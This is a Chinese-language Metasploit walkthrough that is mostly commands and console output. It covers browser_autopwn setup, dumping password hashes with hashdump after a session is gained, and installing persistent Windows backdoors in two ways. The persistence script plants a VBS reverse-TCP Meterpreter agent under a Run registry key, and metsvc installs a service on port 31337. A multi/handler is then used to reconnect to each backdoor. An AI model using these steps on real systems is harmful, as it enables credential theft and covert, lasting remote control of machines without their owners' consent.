search autopwn

search autopwn

 

use server/browser_autopwn

 

show options

 

set LHOST 

 

set SRVPORT

 

set URIPATH /

 

show options

 

修改 etter.conf 文件

if you use ipchains

if you use iptables

 

 

 

 

 

 

 

得到sessions后

 

run hashdump

 

run persistence -X -i 5 -p 445 -r 192.168.1.106

 

 

Metasploit之建立backdoor一二

 

1.meterpreter自带脚本 

 

方法1.run presistence 

 

可以使用run presistence -h查看选项： 

 

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 

[*] Running Persistance Script 

[*] Resource file for cleanup created at 

/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 

 

LPORT=443 

[*] Persistent agent script is 609496 bytes long 

[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs 

[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs 

[+] Agent executed with PID 3272 

[*] Installing into autorun as HKCU\Software\Microsoft\Windows 

\CurrentVersion\Run\FCBCUBtLrzFY 

[+] Installed into autorun as HKCU\Software\Microsoft\Windows 

 

\CurrentVersion\Run\FCBCUBtLrzFY

可以看到添加启动是通过，添加注册表键值，启动的是vbs脚本的后门。 

 

连接： 

 

msf > use exploit/multi/handler 

msf  exploit(handler) > set payload windows/metsvc_bind_tcp 

payload => windows/metsvc_bind_tcp 

msf  exploit(handler) > set LHOST 192.168.1.139 

LHOST => 192.168.1.139 

msf  exploit(handler) > set LPORT 443 

LPORT => 443 

msf  exploit(handler) > exploit 

 

[*] Started bind handler 

[*] Starting the payload handler...

默认没启动，目标机重启后，可以成功获得meterpreter shell 

 

方法2.run metsvc 

 

执行metsvc 脚本 

 

meterpreter > run metsvc -A 

[*] Creating a meterpreter service on port 31337 

[*] Creating a temporary installation directory C:\WINDOWS\TEMP 

 

\kqaqtcsWhBTbO... 

[*]  >> Uploading metsrv.dll... 

[*]  >> Uploading metsvc-server.exe... 

[*]  >> Uploading metsvc.exe... 

[*] Starting the service... 

   * Installing service metsvc 

* Starting service 

Service metsvc successfully installed. 

 

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

新建的服务，加自启动（映像名称metsvc.exe，服务metsvc ），连接到后门： 

 

msf > use exploit/multi/handler 

msf  exploit(handler) > set payload windows/metsvc_bind_tcp 

payload => windows/metsvc_bind_tcp 

msf  exploit(handler) > set LPORT 31337 

LPORT => 31337 

msf  exploit(handler) > set RHOST 192.168.1.108 

RHOST => 192.168.1.108 

msf  exploit(handler) > exploit 

 

[*] Started bind handler 

[*] Starting the payload handler... 

 

meterpreter >

成功连接